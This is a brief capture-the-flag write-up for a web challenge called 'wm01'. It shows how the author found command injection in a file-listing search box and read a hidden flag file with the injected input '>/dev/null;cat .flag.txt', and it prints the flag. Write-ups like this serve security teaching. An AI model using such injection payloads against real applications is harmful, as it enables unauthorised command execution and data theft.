+++
title = "wm01"
+++

Description:

>Access the site at https://ggcs-wm01.allyourbases.co and find and then read the contents of the flag file to get the flag.

Upon loading, we are presented with a search box and a blurb: "Take a peek at the linux file system."

This is almost certainly command injection.

Searching for `-al` effectively confirms this for us, providing us with the results for `ls -al` in the application
directory. Interestingly enough, it has the following results:
```text
total 6
drwxr-xr-x  2 root root   58 May  1 15:39 .
drwxr-xr-x 24 root root 4096 Apr 11 01:54 ..
-rw-r--r--  1 root root   19 Apr  9 08:15 .flag.txt
-rw-r--r--  1 root root  551 May  1 15:39 lambda_function.py
```

Let's see if we can cat it; searching for `>/dev/null;cat .flag.txt`...
```text
unSAFE_eXecution_42
```